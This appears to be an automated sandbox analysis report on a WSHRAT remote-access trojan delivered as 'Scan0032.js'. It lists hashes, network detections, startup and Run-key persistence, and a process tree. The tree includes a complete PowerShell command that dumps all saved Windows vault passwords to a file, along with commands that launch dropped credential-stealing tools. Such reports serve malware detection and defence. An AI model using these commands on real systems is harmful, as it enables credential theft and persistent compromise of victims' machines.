Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
01/10/2021, 10:33
Static task
static1
Behavioral task
behavioral1
Sample
Scan0032.js
Resource
win7-en-20210920
General
-
Target
Scan0032.js
-
Size
1.1MB
-
MD5
126c1417ab24cd6b4bf8889a5254ae18
-
SHA1
b9465bbe07f047f063f8e2a2e3dba87181fceac6
-
SHA256
bd1b9e3102b57857d294df0339682f25e2ccb17d0665c77dfefe6565a68f85ff
-
SHA512
bca88a55671be0e903f9ddaa9002dc37ba0c97f7c15431f09069c3740c41e5702fafa900bdaf0a0d436fc6bd50c669e4a22a70ac28b909ddc98726da24959a55
Malware Config
Signatures
-
suricata: ET MALWARE WSHRAT CnC Checkin
suricata: ET MALWARE WSHRAT CnC Checkin
-
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
suricata: ET MALWARE WSHRAT Credential Dump Module Download Command Inbound
-
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/files/0x000100000001b086-180.dat MailPassView behavioral2/files/0x000100000001b086-181.dat MailPassView -
Nirsoft 2 IoCs
resource yara_rule behavioral2/files/0x000100000001b086-180.dat Nirsoft behavioral2/files/0x000100000001b086-181.dat Nirsoft -
Blocklisted process makes network request 23 IoCs
flow pid Process 3 4060 wscript.exe 5 4060 wscript.exe 6 4060 wscript.exe 7 4060 wscript.exe 8 4060 wscript.exe 9 4060 wscript.exe 11 4060 wscript.exe 18 4060 wscript.exe 19 4060 wscript.exe 20 4060 wscript.exe 21 4060 wscript.exe 26 4060 wscript.exe 29 4060 wscript.exe 30 4060 wscript.exe 31 4060 wscript.exe 32 4060 wscript.exe 33 4060 wscript.exe 34 4060 wscript.exe 35 4060 wscript.exe 36 4060 wscript.exe 37 4060 wscript.exe 38 4060 wscript.exe 39 4060 wscript.exe -
Executes dropped EXE 2 IoCs
pid Process 768 python.exe 3832 cmdc.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0032.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan0032.js wscript.exe -
Loads dropped DLL 2 IoCs
pid Process 768 python.exe 768 python.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Scan0032 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scan0032.js\"" wscript.exe Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan0032 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Local\\Temp\\Scan0032.js\"" wscript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 2 IoCs
pid Process 3748 taskkill.exe 2416 taskkill.exe -
Script User-Agent 21 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 19 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 30 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 37 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 38 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 39 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 18 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 20 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 26 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 34 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 35 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 7 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 31 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 33 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 36 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 6 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 8 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 9 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 21 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 29 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands HTTP User-Agent header 32 WSHRAT|3ED10BF6|GFBFPSXA|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 1/10/2021|JavaScript-v3.4|NL:Netherlands -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2700 powershell.exe 2700 powershell.exe 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe Token: 35 768 python.exe Token: SeDebugPrivilege 3748 taskkill.exe Token: SeDebugPrivilege 2416 taskkill.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 4060 wrote to memory of 2700 4060 wscript.exe 74 PID 4060 wrote to memory of 2700 4060 wscript.exe 74 PID 4060 wrote to memory of 3636 4060 wscript.exe 78 PID 4060 wrote to memory of 3636 4060 wscript.exe 78 PID 3636 wrote to memory of 768 3636 cmd.exe 80 PID 3636 wrote to memory of 768 3636 cmd.exe 80 PID 3636 wrote to memory of 768 3636 cmd.exe 80 PID 4060 wrote to memory of 2432 4060 wscript.exe 82 PID 4060 wrote to memory of 2432 4060 wscript.exe 82 PID 2432 wrote to memory of 3748 2432 cmd.exe 84 PID 2432 wrote to memory of 3748 2432 cmd.exe 84 PID 4060 wrote to memory of 3680 4060 wscript.exe 85 PID 4060 wrote to memory of 3680 4060 wscript.exe 85 PID 3680 wrote to memory of 2416 3680 cmd.exe 87 PID 3680 wrote to memory of 2416 3680 cmd.exe 87 PID 4060 wrote to memory of 3832 4060 wscript.exe 88 PID 4060 wrote to memory of 3832 4060 wscript.exe 88 PID 4060 wrote to memory of 3832 4060 wscript.exe 88 PID 4060 wrote to memory of 2756 4060 wscript.exe 90 PID 4060 wrote to memory of 2756 4060 wscript.exe 90
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Scan0032.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Local\Temp\wshsdk" && C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll > "C:\Users\Admin\AppData\Local\Temp\wshout"2⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\wshsdk\python.exeC:\Users\Admin\AppData\Local\Temp\wshsdk\python.exe C:\Users\Admin\AppData\Local\Temp\rundll3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3748
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\system32\taskkill.exetaskkill /F /IM cmdc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
-
C:\Users\Admin\AppData\Local\Temp\cmdc.exe"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata2⤵
- Executes dropped EXE
PID:3832
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"2⤵PID:2756
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:2244